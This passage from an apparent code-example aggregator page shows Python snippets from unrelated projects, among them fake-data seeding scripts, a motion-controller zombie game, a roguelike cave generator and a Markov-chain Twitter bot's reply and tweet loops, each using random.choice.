            org = Organization.objects.get(name=org_data['name'])
            mailer = Organization.objects.get(name=mail_handled_by)
            org.outgoing_mail_handled_by = mailer
            org.save()

    print "Building pdfs and users..."
    for user_data in data['users']:
        user, created = User.objects.get_or_create(
                username=slugify(user_data['name'])
        )
        if user_data.get('managed', False):
            random_mailing_address = "\n".join([
                # Prisoner number
                "#%s" % "".join(random.choice(string.digits) for a in range(8)),
                # Street
                "%s Cherry Tree Lane" % "".join(
                    random.choice(string.digits) for a in range(3)),
                # City, state, zip
                "City Name, %s  %s" % (
                    random.choice(US_STATES)[0],
                    "".join(random.choice(string.digits) for a in range(5)),
                )
            ])
        else:
            random_mailing_address = ""

        user.profile.display_name = user_data['name']
        user.profile.mailing_address = random_mailing_address
        user.profile.blogger = user_data.get('blogger', False)
        user.profile.managed = user_data.get('managed', False)
        user.profile.consent_form_received = user_data.get('consent_form_received', False)
        user.profile.blog_name = user_data.get('blog_name', None) or ''
        user.profile.save()

        for org_name in user_data['orgs']:
            orgs[org_name].members.add(user)

        for corresp in user_data['correspondence']:
            direction, content = corresp.items()[0]
            if direction == "received":
                # Build Scan
                pdf = build_pdf(content['parts'], user.profile) 
                path = tasks.move_scan_file(filename=pdf)
                scan = Scan.objects.create(
                        uploader=uploader,
                        org=orgs[org_name],
                        author=user,
                        pdf=os.path.relpath(path, settings.MEDIA_ROOT),
                        under_construction=True,
                        processing_complete=True,
                        created=content['date'])
                # execute synchronously
                tasks.split_scan(scan_id=scan.pk)
                # Build Documents
                page_count = 1 # ignore envelope
                for part in content['parts']:
                    page_count += part["pages"]
                    if part["type"] == "ignore":
                        continue
                    document = Document.objects.create(
                            scan=scan,
                            editor=uploader,
                            author=user,
                            type=part["type"],
                            date_written=content["date"],
                            created=content["date"],
                            title=part.get("title", None) or "",
                    )
                    for i, page_index in enumerate(
                            range(page_count - part["pages"], page_count)):
                        scanpage = scan.scanpage_set.get(order=page_index)
                        DocumentPage.objects.create(
                                document=document,
                                scan_page=scanpage,
                                order=i)
                    # execute synchronously
                    if part["type"] in ("profile", "post"):
                        document.status = "published"
                    else:
                        document.status = "unpublishable"
                    document.highlight_transform = '{"document_page_id": %s, "crop": [44.5, 58.66667175292969, 582.5, 288.6666717529297]}' % document.documentpage_set.all()[0].pk
                    document.save()
                    tasks.update_document_images(document.pk)
                    for comment in part.get('comments', []):
                        Comment.objects.create(
                                user=commenter,
                                comment="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Donec a diam lectus. Sed sit amet ipsum mauris. Maecenas congue ligula ac quam viverra nec consectetur ante hendrerit. Donec et mollis dolor. Praesent et diam eget libero egestas mattis sit amet vitae augue. Nam tincidunt congue enim, ut porta lorem lacinia consectetur. Donec ut libero sed arcu vehicula ultricies a non tortor. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Aenean ut gravida lorem. Ut turpis felis, pulvinar a semper sed, adipiscing id dolor. Pellentesque auctor nisi id magna consequat sagittis.",
                                document=document,
                                created=comment['date'],
                        )
        # Finish received scans before parsing letters, to ensure comments/etc
        # are there yet.
        for corresp in user_data['correspondence']:
            direction, content = corresp.items()[0]
            if direction == "sent":
                letter = Letter(type=content['type'], 
                        auto_generated=True, 
                        sender=uploader,
                        created=content['date'],
                        sent=content['date'],
                        recipient=user,
                        org=Organization.objects.get(name=user_data['orgs'][0]))
                if content['type'] == "comments":
                    letter.save()
                    comments = Comment.objects.unmailed().filter(
                            document__author=user,
                            created__lt=content['date']
                    )
                    for comment in comments:
                        letter.comments.add(comment)
                elif content['type'] == "letter":
                    letter.body = content['body']
                letter.save()

Example 11

Project: ulakbus
Source File: fake_data_generator.py
View license
    @staticmethod
    def yeni_personel(personel_turu=1, unit='', personel_say=1, user=None):
        """
        Rastgele verileri ve parametre olarak verilen veriyi kullanarak
        yeni personel kaydı oluştururup kaydeder. Oluşturulan kayıtları liste olarak döndürür.

        Args:
            personel_turu (Personel): Personel türü
            unit (Unit) : Unit nesnesi
            personel_say : Oluşturulacak personel sayısı
            user : Personele atanacak user

        Returns:
            Personel: Yeni personel listesi

        """

        personel_list = []

        for i in range(personel_say):
            p = Personel()
            p.tckn = ints(length=11)
            p.ad = fake.first_name()
            p.soyad = fake.last_name()
            p.cinsiyet = gender()
            p.uyruk = fake.country()
            p.medeni_hali = marital_status(student=False)
            p.ikamet_adresi = fake.address()
            p.ikamet_il = fake.state()
            p.ikamet_ilce = fake.state()
            p.adres_2 = fake.address()
            p.oda_no = fake.classroom_code()
            p.oda_tel_no = fake.phone_number()
            p.cep_telefonu = fake.phone_number()
            p.e_posta = fake.email()
            p.e_posta_2 = fake.email()
            p.e_posta_3 = fake.email()
            p.web_sitesi = "http://%s" % fake.domain_name()
            p.yayinlar = '\n'.join(fake.paragraphs())
            p.projeler = '\n'.join(fake.paragraphs())
            p.kan_grubu = blood_type()
            p.ehliyet = driver_license_class()
            p.verdigi_dersler = '\n'.join([fake.lecture() for _ in range(3)])
            p.unvan = random.choice(range(1, 5))
            p.biyografi = '\n'.join(fake.paragraphs(5))
            p.notlar = '\n'.join(fake.paragraphs(1))
            p.personel_turu = personel_turu
            p.cuzdan_seri = id_card_serial()
            p.cuzdan_seri_no = ints(length=10)
            p.baba_adi = fake.first_name_male()
            p.ana_adi = fake.first_name_female()
            p.dogum_tarihi = birth_date(student=False)
            p.dogum_yeri = fake.state()
            p.medeni_hali = random.choice(['1', '2'])
            p.hizmet_sinifi = random.choice(range(1, 30))
            p.birim = unit
            p.gorev_suresi_baslama = (datetime.datetime.now() - datetime.timedelta(
                days=random.choice(range(1, 30))))
            p.goreve_baslama_tarihi = p.gorev_suresi_baslama

            p.gorev_suresi_bitis = (datetime.datetime.now() + datetime.timedelta(
                days=random.choice(range(1, 30))))

            p.kh_sonraki_terfi_tarihi = (datetime.datetime.now() + datetime.timedelta(
                days=random.choice(range(1, 30))))
            p.ga_sonraki_terfi_tarihi = (datetime.datetime.now() + datetime.timedelta(
                days=random.choice(range(1, 30))))
            p.em_sonraki_terfi_tarihi = (datetime.datetime.now() + datetime.timedelta(
                days=random.choice(range(1, 30))))

            p.kazanilmis_hak_derece = random.randint(1, 7)
            p.kazanilmis_hak_kademe = random.randint(1, 8)
            p.kazanilmis_hak_ekgosterge = random.randint(1000, 3000)

            p.gorev_ayligi_derece = random.randint(1, 7)
            p.gorev_ayligi_kademe = random.randint(1, 8)
            p.gorev_ayligi_ekgosterge = random.randint(1000, 3000)

            p.emekli_muktesebat_derece = random.randint(1, 7)
            p.emekli_muktesebat_kademe = random.randint(1, 8)
            p.emekli_muktesebat_ekgosterge = random.randint(1000, 3000)

            p.gorunen_gorev_ayligi_kademe = random.randint(1, 8)
            p.gorunen_kazanilmis_hak_kademe = random.randint(1, 8)


            if user:
                p.user = user
            else:
                username = fake.slug(u'%s-%s' % (p.ad, p.soyad))
                n_user = new_user(username=username)
                p.user = n_user

            p.save()
            personel_list.append(p)
        return personel_list

Example 12

Project: NaNoGenLab
Source File: ending-concordance.py
View license
def main(argv):
    filenames = argv[1:]

    words = []

    for filename in tqdm(filenames):
        with open(filename, 'r') as f:
            for line in f:
                bits = line.strip().split()
                for bit in bits:
                    words.extend(bit.split('--'))

    index = {}
    for word in words:
        orig_word = word
        if word.endswith(('.', '!', '?', ';', ',')):
            word = word[:-1]
        if word.startswith(('"', "'", '(')):
            word = word[1:]
        if word.endswith(('"', "'", ')')):
            word = word[:-1]
        if word.endswith(('.', '!', '?', ';', ',')):
            word = word[:-1]
        #sys.stdout.write(word + ' ')
        if len(word) > 4:
            index.setdefault(word[-2:], set()).add(word)

    pick_from = []
    for key, s in index.iteritems():
        if len(s) >= 15:  # say
            pick_from.append(key)

    for i in xrange(0, 10):
        pick1 = list(index[random.choice(pick_from)])
        pick2 = list(index[random.choice(pick_from)])
        for j in xrange(0, 10):
            sys.stdout.write(random.choice(pick1) + ' ')
            sys.stdout.write(random.choice(pick2) + ' ')
        sys.stdout.write('!\n\n')

    sys.exit(0)
    sentences.append(sentence)

    beginners = {}
    enders = {}

    for sentence in tqdm(sentences):
        l = len(sentence)
        if l % 2 == 1:
            # odd. odd is good
            i = l / 2
            middle = sentence[i]
        elif l != 0:
            # even. we can work with even, yes we can.
            i = l / 2
            middle = sentence[i]  # and i - 1
        else:
            continue
        if not middle:
            continue
        begin = sentence[:i]
        end = sentence[i+1:]
        beginners.setdefault(middle, []).append(begin)
        enders.setdefault(middle, []).append(end)

    frequency = {}
    common_keys = []
    MIN = 100
    for middle in tqdm(beginners):
        if middle in enders:
            frequency.setdefault(len(beginners[middle]) + len(enders[middle]), []).append(middle)
            if len(beginners[middle]) < MIN and len(enders[middle]) < MIN:
                pass
            else:
                common_keys.append(middle)

    if DEBUG:
        for freq in sorted(frequency, reverse=True):
            print freq, frequency[freq]

    for x in xrange(0, 10):
        for y in xrange(0, 10):
            middle = random.choice(common_keys)
            beginner = random.choice(beginners[middle])
            ender = random.choice(enders[middle])
            if DEBUG:
                print repr(middle), len(beginners[middle]), len(enders[middle])
            print sentencify(beginner + [middle] + ender),
        print
        print

    if DEBUG:
        for middle in common_keys:
            print '======='
            print repr(middle)
            print '----'
            for x in beginners[middle]:
                print sentencify(x)
            print '----'
            for x in enders[middle]:
                print sentencify(x)

Example 13

Project: JoustMania
Source File: zombie.py
View license
    def Start(self):
        running = True
        moves = []
        for move_num in range(len(self.controllers_alive)):
            moves.append(common.get_move(self.controllers_alive[move_num], move_num))

        serials = self.controllers_alive
        processes = []
        
        for num_try, serial in enumerate(serials):
            starting_bullets = 0
            #starting_bullets = random.choice([0, 1])
            opts = Array('i', [0, 0, 0, 1, starting_bullets, 1, 1])
            p = Process(target=track_controller, args=(serial, num_try, opts))
            p.start()
            processes.append(p)
            self.controller_opts[serial] = opts
            self.humans.append(serial)
            

        human_victory = Audio('audio/Zombie/sound_effects/human_victory.wav')
        zombie_victory = Audio('audio/Zombie/sound_effects/zombie_victory.wav')
        death = Audio('audio/Zombie/sound_effects/zombie_death.wav')
        pistol = Audio('audio/Zombie/sound_effects/pistol.wav')
        shotgun = Audio('audio/Zombie/sound_effects/shotgun.wav')
        molotov = Audio('audio/Zombie/sound_effects/molotov.wav')
        try:
            music = Audio('audio/Zombie/music/' + random.choice(os.listdir('audio/Zombie/music/')))
            music.start_effect_music()
        except:
            print('no music in audio/Zombie/music/')

        start_kill = time.time() + 5
        while time.time() < start_kill:
            pass

        #kill first humans
        for i in range(2):
            random_human = random.choice(self.humans)
            self.controller_opts[random_human][3] = 0
        
        while running:
            self.audio_cue()
            #human update, loop through the different human controllers
            for serial in self.humans:
                #human is dead and now a zombie
                if self.controller_opts[serial][3] == 0:
                    self.controller_opts[serial][0] = 1
                    self.dead_zombies[serial] = time.time() + self.get_kill_time()
                    
                #pistol fired(1 bullet 1 random alive zombie)
                elif self.controller_opts[serial][1] == 2:
                    pistol.start_effect()
                    self.kill_zombies(1, [0, 0, 0, 0, 1, 1, 1])
                    self.controller_opts[serial][1] = 0
                            

                #shotgun fired(2 bullets 3 random alive zombies)
                #elif self.controller_opts[serial][1] == 3:
                #    shotgun.start_effect()
                #    self.kill_zombies(3, [ 0, 0, 1, 1, 2])
                #    self.controller_opts[serial][1] = 0


                #molotov fired(5 bullets all alive zombies)
                elif self.controller_opts[serial][1] == 4:
                    molotov.start_effect()
                    self.kill_zombies(20, [0, 0, 1, 1, 2, 3])
                    self.controller_opts[serial][1] = 0

                    
            for serial, spawn_time in self.dead_zombies.items():
                if serial in self.humans:
                    self.humans.remove(serial)
                if spawn_time < time.time():
                    #set zombie to alive
                    self.controller_opts[serial][3] = 1
                    self.alive_zombies.append(serial)

            #loop through dead zombies
            for serial in self.alive_zombies:
                if serial in self.dead_zombies:
                    del self.dead_zombies[serial]

                #melee
                if self.controller_opts[serial][3] == 0:
                    self.controller_opts[serial][0] = 1
                    self.dead_zombies[serial] = time.time() + self.get_kill_time()
                    self.alive_zombies.remove(serial)
                    self.reward([0, 0, 1, 1, 2])
                    death.start_effect()

            #win scenario
            if len(self.humans) <= 0 or (time.time() - self.start_time) > self.win_time:
                for proc in processes:
                    proc.terminate()
                    proc.join()
                pause_time = time.time() + 3
                HSV = [(x*1.0/(50*len(self.controllers_alive)), 0.9, 1) for x in range(50*len(self.controllers_alive))]
                colour_range = [[int(x) for x in common.hsv2rgb(*colour)] for colour in HSV]
                win_controllers = []
                if len(self.humans) <= 0:
                    zombie_victory.start_effect()
                    self.alive_zombies.extend(self.dead_zombies.keys())
                    win_controllers = self.alive_zombies
                if (time.time() - self.start_time) > self.win_time:
                    human_victory.start_effect()
                    win_controllers = self.humans
                #This needs to go in it's own function
                while time.time() < pause_time:
                    for win_move in moves:
                        if win_move.get_serial() in win_controllers:
                            win_move.set_leds(*colour_range[0])
                            colour_range.append(colour_range.pop(0))
                            win_move.update_leds()
                        else:
                            win_move.set_rumble(100)
                            win_move.poll()
                            win_move.set_leds(0, 0, 0)
                            win_move.update_leds()
                    time.sleep(0.01)
                running = False
                try:
                    music.stop_effect_music()
                except:
                    print('no audio loaded')

Example 14

Project: flax
Source File: fractor.py
View license
    def generate(self):
        self.map_canvas.clear(Floor)

        # So what I want here is to have a cave system with a room in the
        # middle, then decay the room.
        # Some constraints:
        # - the room must have a wall where the entrance could go, which faces
        # empty space
        # - a wall near the entrance must be destroyed
        # - the player must start in a part of the cave connected to the
        # destroyed entrance
        # - none of the decay applied to the room may block off any of its
        # interesting features

        # TODO it would be nice if i could really write all this without ever
        # having to hardcode a specific direction, so the logic could always be
        # rotated freely
        side = random.choice([Direction.left, Direction.right])

        # TODO assert region is big enough
        room_size = Size(
            random_normal_range(9, int(self.region.width * 0.4)),
            random_normal_range(9, int(self.region.height * 0.4)),
        )

        room_position = self.region.center() - room_size // 2
        room_position += Point(
            random_normal_int(0, self.region.width * 0.1),
            random_normal_int(0, self.region.height * 0.1),
        )

        room_rect = Rectangle(room_position, room_size)
        self.room_region = room_rect

        room = Room(room_rect)

        cave_area = (
            Blob.from_rectangle(self.region)
            - Blob.from_rectangle(room_rect)
        )
        self.cave_region = cave_area
        walls = [point for (point, _) in self.region.iter_border()]
        floors = []
        for point, edge in room_rect.iter_border():
            if edge is side or edge.adjacent_to(side):
                floors.append(point)
                floors.append(point + side)
        generate_caves(
            self.map_canvas, cave_area, CaveWall,
            force_walls=walls, force_floors=floors,
        )

        room.draw_to_canvas(self.map_canvas)

        # OK, now draw a gate in the middle of the side wall
        if side is Direction.left:
            x = room_rect.left
        else:
            x = room_rect.right
        mid_y = room_rect.top + room_rect.height // 2
        if room_rect.height % 2 == 1:
            min_y = mid_y - 1
            max_y = mid_y + 1
        else:
            min_y = mid_y - 2
            max_y = mid_y + 1
        for y in range(min_y, max_y + 1):
            self.map_canvas.set_architecture(Point(x, y), KadathGate)

        # Beat up the border of the room near the gate
        y = random.choice(
            tuple(range(room_rect.top, min_y))
            + tuple(range(max_y + 1, room_rect.bottom))
        )
        for dx in range(-2, 3):
            for dy in range(-2, 3):
                point = Point(x + dx, y + dy)
                # TODO i think what i may want is to have the cave be a
                # "Feature", where i can check whether it has already claimed a
                # tile, or draw it later, or whatever.
                if self.map_canvas._arch_grid[point] is not CaveWall:
                    distance = abs(dx) + abs(dy)
                    ruination = random_normal_range(0, 0.2) + distance * 0.2
                    self.map_canvas.set_architecture(
                        point, e.Rubble(Breakable(ruination)))

        # And apply some light ruination to the inside of the room
        border = list(room_rect.iter_border())
        # TODO don't do this infinitely; give up after x tries
        while True:
            point, edge = random.choice(border)
            if self.map_canvas._arch_grid[point + edge] is CaveWall:
                break
        self.map_canvas.set_architecture(point, CaveWall)
        self.map_canvas.set_architecture(point - edge, CaveWall)
        # TODO this would be neater if it were a slightly more random pattern
        for direction in (
                Direction.up, Direction.down, Direction.left, Direction.right):
            self.map_canvas.set_architecture(
                point - edge + direction, CaveWall)

Example 15

Project: markovbot
Source File: markovbot.py
View license
	def _autoreply(self):
		
		"""Continuously monitors Twitter Stream and replies when a tweet
		appears that matches self._targetstring. It will include
		self._tweetprefix and self._tweetsuffix in the tweets, provided they
		are not None.
		"""
		
		# Run indefinitively
		while self._autoreplythreadlives:

			# Wait a bit before rechecking whether autoreplying should be
			# started. It's highly unlikely the bot will miss something if
			# it is a second late, and checking continuously is a waste of
			# resource.
			time.sleep(1)

			# Only start when the bot logs in to twitter, and when a
			# target string is available
			if self._loggedin and self._targetstring != None:
	
				# Acquire the TwitterStream lock
				self._tslock.acquire(True)
	
				# Create a new iterator from the TwitterStream
				iterator = self._ts.statuses.filter(track=self._targetstring)
				
				# Release the TwitterStream lock
				self._tslock.release()
	
				# Only check for tweets when autoreplying
				while self._autoreplying:
					
					# Get a new Tweet (this will block until a new
					# tweet becomes available, but can also raise a
					# StopIteration Exception every now and again.)
					try:
						# Attempt to get the next tweet.
						tweet = iterator.next()
					except StopIteration:
						# Restart the iterator, and skip the rest of
						# the loop.
						iterator = self._ts.statuses.filter(track=self._targetstring)
						continue
					
					# Restart the connection if this is a 'hangup'
					# notification, which will be {'hangup':True}
					if u'hangup' in tweet.keys():
						# Reanimate the Twitter connection.
						self._twitter_reconnect()
						# Skip further processing.
						continue
					
					# Store a copy of the latest incoming tweet, for
					# debugging purposes
					self._lasttweetin = copy.deepcopy(tweet)
					
					# Only proceed if autoreplying is still required (there
					# can be a delay before the iterator produces a new, and
					# by that time autoreplying might already be stopped)
					if not self._autoreplying:
						# Skip one cycle, which will likely also make the
						# the while self._autoreplying loop stop
						continue

					# Report to console
					self._message(u'_autoreply', u"I've found a new tweet!")
					try:
						self._message(u'_autoreply', u'%s (@%s): %s' % \
							(tweet[u'user'][u'name'], \
							tweet[u'user'][u'screen_name'], tweet[u'text']))
					except:
						self._message(u'_autoreply', \
							u'Failed to report on new Tweet :(')
					
					# Don't reply to this bot's own tweets
					if tweet[u'user'][u'id_str'] == self._credentials[u'id_str']:
						# Skip one cycle, which will bring us to the
						# next tweet
						self._message(u'_autoreply', \
							u"This tweet was my own, so I won't reply!")
						continue
					
					# Don't reply to retweets
					if u'retweeted_status' in tweet.keys():
						# Skip one cycle, which will bring us to the
						# next tweet
						self._message(u'_autoreply', \
							u"This was a retweet, so I won't reply!")
						continue

					# Don't reply to tweets that are in the nono-list
					if tweet[u'id_str'] in self._nonotweets:
						# Skip one cycle, which will bring us to the
						# next tweet
						self._message(u'_autoreply', \
							u"This tweet was in the nono-list, so I won't reply!")
						continue

					# Skip tweets that are too deep into a conversation
					if self._maxconvdepth != None:
						# Get the ID of the tweet that the current tweet
						# was a reply to
						orid = tweet[u'in_reply_to_status_id_str']
						# Keep digging through the tweets until the the
						# top-level tweet is found, or until we pass the
						# maximum conversation depth
						counter = 0
						while orid != None and orid not in self._nonotweets:
							# If the current in-reply-to-ID is not None,
							# the current tweet was a reply. Increase
							# the reply counter by one.
							ortweet = self._t.statuses.show(id=orid)
							orid = ortweet[u'in_reply_to_status_id_str']
							counter += 1
							# Stop counting when the current value
							# exceeds the maximum allowed depth
							if counter >= self._maxconvdepth:
								# Add the current tweets ID to the list
								# of tweets that this bot should not
								# reply to. (Keeping track prevents
								# excessive use of the Twitter API by
								# continuously asking for the
								# in-reply-to-ID of tweets)
								self._nonotweets.append(orid)
						# Don't reply if this tweet is a reply in a tweet
						# conversation of more than self._maxconvdepth tweets,
						# or if the tweet's ID is in this bot's list of
						# tweets that it shouldn't reply to
						if counter >= self._maxconvdepth or \
							orid in self._nonotweets:
							self._message(u'_autoreply', \
								u"This tweet is part of a conversation, and I don't reply to conversations with over %d tweets." % (self._maxconvdepth))
							continue
					
					# Detect the language of the tweet, if the
					# language of the reply depends on it.
					if self._autoreply_database == u'auto-language':
						# Get the language of the tweet, or default
						# to English if it isn't available.
						if u'lang' in tweet.keys():
							lang = tweet[u'lang'].lower()
							self._message(u'_autoreply', u"I detected language: '%s'." % (lang))
						else:
							lang = u'en'
							self._message(u'_autoreply', u"I couldn't detect the language, so I defaulted to '%s'." % (lang))
						# Check if the language is available in the
						# existing dicts. Select the associated
						# database, or default to English when the
						# detected language isn't available, or
						# default to u'default' when English is not
						# available.
						if lang in self.data.keys():
							database = lang
							self._message(u'_autoreply', u"I chose database: '%s'." % (database))
						elif u'en' in self.data.keys():
							database = u'en'
							self._message(u'_autoreply', u"There was no database for detected language '%s', so I defaulted to '%s'." % (lang, database))
						else:
							database = u'default'
							self._message(u'_autoreply', u"There was no database for detected language '%s', nor for 'en', so I defaulted to '%s'." % (lang, database))
					# Randomly choose a database if a random database
					# was requested. Never use an empty database,
					# though (the while loop prevents this).
					elif self._autoreply_database == u'random-database':
						database = random.choice(self.data.keys())
						while self.data[database] == {}:
							database = random.choice(self.data.keys())
						self._message(u'_autoreply', \
							u'Randomly chose database: %s' % (database))
					# Randomly choose a database out of a list of
					# potential databases.
					elif type(self._autoreply_database) in [list, tuple]:
						database = random.choice(self._autoreply_database)
						self._message(u'_autoreply', \
							u'Randomly chose database: %s' % (database))
					# Use the preferred database.
					elif type(self._autoreply_database) in [str, unicode]:
						database = copy.deepcopy(self._autoreply_database)
						self._message(u'_autoreply', \
							u'Using database: %s' % (database))
					# If none of the above options apply, default to
					# the default database.
					else:
						database = u'default'
						self._message(u'_autoreply', \
							u'Defaulted to database: %s' % (database))
					
					# If the selected database is not a string, or if
					# it is empty, then fall back on the default
					# database.
					if type(database) not in [str, unicode]:
						self._message(u'_autoreply', \
							u"Selected database '%s' is invalid, defaulting to: %s" % (database, u'default'))
						database = u'default'
					elif database not in self.data.keys():
						self._message(u'_autoreply', \
							u"Selected database '%s' does not exist, defaulting to: %s" % (database, u'default'))
						database = u'default'
					elif self.data[database] == {}:
						self._message(u'_autoreply', \
							u"Selected database '%s' is empty, defaulting to: %s" % (database, u'default'))
						database = u'default'
	
					# Separate the words in the tweet
					tw = tweet[u'text'].split()
					# Clean up the words in the tweet
					for i in range(len(tw)):
						# Remove clutter
						tw[i] = tw[i].replace(u'@',u''). \
							replace(u'#',u'').replace(u'.',u''). \
							replace(u',',u'').replace(u';',u''). \
							replace(u':',u'').replace(u'!',u''). \
							replace(u'?',u'').replace(u"'",u'')

					# Make a list of potential seed words in the tweet
					seedword = []
					if self._keywords != None:
						for kw in self._keywords:
							# Check if the keyword is in the list of
							# words from the tweet
							if kw in tw:
								seedword.append(kw)
					# If there are no potential seeds in the tweet, None
					# will lead to a random word being chosen
					if len(seedword) == 0:
						seedword = None
					# Report back on the chosen keyword
					self._message(u'_autoreply', u"I found seedwords: '%s'." % (seedword))

					# Construct a prefix for this tweet, which should
					# include the handle ('@example') of the sender
					if self._tweetprefix == None:
						prefix = u'@%s' % (tweet[u'user'][u'screen_name'])
					else:
						# Use the specified prefix.
						if type(self._tweetprefix) in [str, unicode]:
							prefix = u'@%s %s' % \
								(tweet[u'user'][u'screen_name'], \
								self._tweetprefix)
						# Randomly choose one of the specified
						# prefixes.
						elif type(self._tweetprefix) in [list, tuple]:
							prefix = u'@%s %s' % \
								(tweet[u'user'][u'screen_name'], \
								random.choice(self._tweetprefix))
						# Fall back on the default option.
						else:
							prefix = u'@%s' % (tweet[u'user'][u'screen_name'])
							self._message(u'_autoreply', \
								u"Could not recognise the type of prefix '%s'; using no prefix." % (self._tweetprefix))

					# Construct a suffix for this tweet. We use the
					# specified prefix, which can also be None. Or
					# we randomly select one from a list of potential
					# suffixes.
					if self._tweetsuffix == None:
						suffix = copy.deepcopy(self._tweetprefix)
					elif type(self._tweetsuffix) in [str, unicode]:
						suffix = copy.deepcopy(self._tweetprefix)
					elif type(self._tweetprefix) in [list, tuple]:
						suffix = random.choice(self._tweetprefix)
					else:
						suffix = None
						self._message(u'_autoreply', \
							u"Could not recognise the type of suffix '%s'; using no suffix." % (self._tweetsuffix))

					# Construct a new tweet
					response = self._construct_tweet(database=database, \
						seedword=None, prefix=prefix, suffix=suffix)

					# Acquire the twitter lock
					self._tlock.acquire(True)
					# Reply to the incoming tweet
					try:
						# Post a new tweet
						resp = self._t.statuses.update(status=response,
							in_reply_to_status_id=tweet[u'id_str'],
							in_reply_to_user_id=tweet[u'user'][u'id_str'],
							in_reply_to_screen_name=tweet[u'user'][u'screen_name']
							)
						# Report to the console
						self._message(u'_autoreply', u'Posted reply: %s' % (response))
						# Store a copy of the latest outgoing tweet, for
						# debugging purposes
						self._lasttweetout = copy.deepcopy(resp)
					except Exception, e:
						self._error(u'_autoreply', u"Failed to post a reply: '%s'" % (e))
					# Release the twitter lock
					self._tlock.release()
					
					# Wait for the minimal tweeting delay.
					time.sleep(60.0*self._mindelay)

Example 16

Project: markovbot
Source File: markovbot.py
View license
	def _autotweet(self):
		
		"""Automatically tweets on a periodical basis.
		"""

		# Run indefinitively
		while self._tweetingthreadlives:

			# Wait a bit before rechecking whether tweeting should be
			# started. It's highly unlikely the bot will miss something if
			# it is a second late, and checking continuously is a waste of
			# resources.
			time.sleep(1)

			# Only start when the bot logs in to twitter, and when tweeting
			# is supposed to happen
			while self._loggedin and self._autotweeting:
				
				# Choose a random keyword
				kw = None
				if self._tweetingkeywords != None:
					if type(self._tweetingkeywords) in \
						[str, unicode]:
						kw = self._tweetingkeywords
					else:
						kw = random.choice(self._tweetingkeywords)
				
				# Choose the database to use. If the database should be
				# random, then randomly choose a non-empty database.
				if self._tweetingdatabase == u'random-database':
					database = random.choice(self.data.keys())
					while self.data[database] == {}:
						database = random.choice(self.data.keys())
					self._message(u'_autotweet', \
						u'Randomly chose database: %s' % (database))
				# If the database is a list of alternatives, randomly
				# select one.
				elif type(self._tweetingdatabase) in [list, tuple]:
					database = random.choice(self._tweetingdatabase)
				# If the specified database is a string, use it.
				elif type(self._tweetingdatabase) in [str, unicode]:
					database = copy.deepcopy(self._tweetingdatabase)
				# Fall back on the default option.
				else:
					self._message(u'_autotweet', \
						u"Could not recognise the type of database '%s'; using '%s' instead." % (self._tweetingdatabase, u'default'))
					database = u'default'

				# Construct a prefix for this tweet. We use the
				# specified prefix, which can also be None. Or
				# we randomly select one from a list of potential
				# prefixes.
				if self._tweetingprefix == None:
					prefix = copy.deepcopy(self._tweetingprefix)
				elif type(self._tweetingprefix) in [str, unicode]:
					prefix = copy.deepcopy(self._tweetingprefix)
				elif type(self._tweetingprefix) in [list, tuple]:
					prefix = random.choice(self._tweetingprefix)
				else:
					prefix = None
					self._message(u'_autotweet', \
						u"Could not recognise the type of prefix '%s'; using no suffix." % (self._tweetingprefix))

				# Construct a suffix for this tweet. We use the
				# specified suffix, which can also be None. Or
				# we randomly select one from a list of potential
				# suffixes.
				if self._tweetingsuffix == None:
					suffix = copy.deepcopy(self._tweetingsuffix)
				elif type(self._tweetingsuffix) in [str, unicode]:
					suffix = copy.deepcopy(self._tweetingsuffix)
				elif type(self._tweetingsuffix) in [list, tuple]:
					suffix = random.choice(self._tweetingsuffix)
				else:
					suffix = None
					self._message(u'_autotweet', \
						u"Could not recognise the type of suffix '%s'; using no suffix." % (self._tweetingsuffix))

				# Construct a new tweet
				newtweet = self._construct_tweet(database=database, \
					seedword=kw, prefix=prefix, suffix=suffix)

				# Acquire the twitter lock
				self._tlock.acquire(True)
				# Reply to the incoming tweet
				try:
					# Post a new tweet
					tweet = self._t.statuses.update(status=newtweet)
					# Report to the console
					self._message(u'_autotweet', \
						u'Posted tweet: %s' % (newtweet))
					# Store a copy of the latest outgoing tweet, for
					# debugging purposes
					self._lasttweetout = copy.deepcopy(tweet)
				except:
					# Reconnect to Twitter.
					self._twitter_reconnect()
					# Try to post again.
					try:
						# Post a new tweet
						tweet = self._t.statuses.update(status=newtweet)
						# Report to the console
						self._message(u'_autotweet', \
							u'Posted tweet: %s' % (newtweet))
						# Store a copy of the latest outgoing tweet,
						# for debugging purposes
						self._lasttweetout = copy.deepcopy(tweet)
					except Exception as e:
						self._error(u'_autotweet', u"Failed to post a tweet! Error: '%s'" % (e))
				# Release the twitter lock
				self._tlock.release()
				
				# Determine the next tweeting interval in minutes
				jitter = random.randint(-self._tweetingjitter, \
					self._tweetingjitter)
				interval = self._tweetinginterval + jitter
				
				# Sleep for the interval (in seconds, hence * 60)
				self._message(u'_autotweet', \
					u'Next tweet in %d minutes.' % (interval))
				time.sleep(interval*60)

Example 17

Project: OmicsIntegrator
Source File: sampling.py
View license
def rejection_sample_bg(fg_dict,organism,bins=100,num_samples=None,verbose=False,
                        bg_match_epsilon=1e-3) :
    '''Generate background sequences according to the size, distance from genes,
    and GC content distributions of the supplied foreground sequences.  *fg_dict*
    is a dictionary of <header>:<sequence> items, where the first part of the
    header must contain:

    >chrX:<start>-<end>

    *organism* is a string that will be used to call the *chipsequtil.get_org
    settings* function and uses the 'genome_dir' and 'annotation_path' keys.
    *bins* is the number of bins to use for representing the GC content
    distribution.  Function returns a dictionary of <header>:<sequence> items
    of generated background sequences.'''

    nib_db = NibDB(nib_dirs=[get_org_settings(organism)['genome_dir']])
    tss_fn = get_org_settings(organism)['annotation_path']
    tss = defaultdict(list)
    for rec in RefGeneFile(tss_fn) :
        tss[rec['chrom']].append((int(rec['txStart']),int(rec['txEnd']),))

    # for each peak find the chromosome, distance to nearest
    # gene, size of peaks in bases, and GC content
    num_samples = len(fg_dict) if not num_samples else num_samples
    dists,sizes=[],[]

    for header,seq in fg_dict.items() :

        # chromosome first field in fasta headers from bed2seq.bedtoseq
        chrom = header.split(':')[0]

        # adjust chromosomes in special cases
        if re.search('random',chrom.lower()) or chrom.lower() == 'chrm' :
            continue

        # start first int in second field of bed2seq.bedtoseq header
        start = int(header.split(':')[1].split('-')[0])
        midpoint = start + len(seq)/2

        # figure out which chromosome we're working on
        tss_chr = tss[chrom]

        # dsts_to_genes is the distance of this peak from all the genes, find minimum
        dists_to_genes = [(s[0]-midpoint) for s in tss_chr]
        try :
            min_dist = min(dists_to_genes,key=lambda x : abs(x))
